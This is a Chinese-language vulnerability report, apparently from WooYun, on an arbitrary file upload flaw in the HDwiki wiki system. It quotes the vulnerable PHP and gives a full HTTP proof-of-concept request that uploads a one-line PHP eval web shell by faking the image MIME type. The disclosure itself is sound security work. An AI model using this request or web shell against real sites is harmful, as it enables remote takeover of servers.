### 简要描述:
互动维客开源系统(HDwiki)作为中国第一家拥有自主知识产权的中文维基(Wiki)系统,由互动在线(北京)科技有限公司于2006 年11月28日正式推出,力争为给国内外众多的维基(Wiki)爱好者提供一个免费、易用、功能强大的维基(Wiki)建站系统。HDwiki的推出,填补了中文维基(Wiki)建站系统的空白
但是HDwiki中某些上传功能存在安全漏洞,通过一些数据即可绕过上传限制,最终控制远程站点
### 详细说明:
lib/file.class.php中
```
function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){
$result=array ('result'=>false,'msg'=>'upload mistake');
if($is_image){
$attach=$attachment;
$filesize=$attach['size']/1024;
if(0==$filesize){
$result['msg'] = '上传错误';
return $result;
}
if(substr($attach['type'],0,6)!='image/'){
$result['msg'] ='格式错误';
return $result;
}
if($filesize>$maxsize){
$result['msg'] ='文件过大';
return $result;
}
}else{
$attach['tmp_name']=$attachment;
}
$filedir=dirname($target);
file::forcemkdir($filedir);
if(@copy($attach['tmp_name'],$target) || @move_uploaded_file($attach['tmp_name'],$target)){
```
没有什么检查
attachment.php里触发
```
function douploadimg() {
$imgname=$_FILES['photofile']['name'];
$extname=file::extname($imgname);
$destfile=$_ENV['attachment']->makepath($extname);
$arrupload=file::uploadfile($_FILES['photofile'],$destfile);
```
### 漏洞证明:
```
POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.wooyun.org/
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7db261e100f2e
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)
Host: www.wooyun.org
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1298002704449; hd_sid=raG13H; hd_auth=4113YBBXXB13XtdR6EXTA1Cb9BuhZMK%2F29wdoHDQJTV5QZOoYd62OHd46iXKqf4Qz%2F5gc6pLm9fZ%2Bdgv68MT; hd_searchtime=1300983373
-----------------------------7db261e100f2e
Content-Disposition: form-data; name="MAX_FILE_SIZE"
30000
-----------------------------7db261e100f2e
Content-Disposition: form-data; name="photofile"; filename="C:\fucker\z.php"
Content-Type: image/image
zzz<?eval($_REQUEST[z])?>
-----------------------------7db261e100f2e--
```
京公网安备 11010502034610号
暂无评论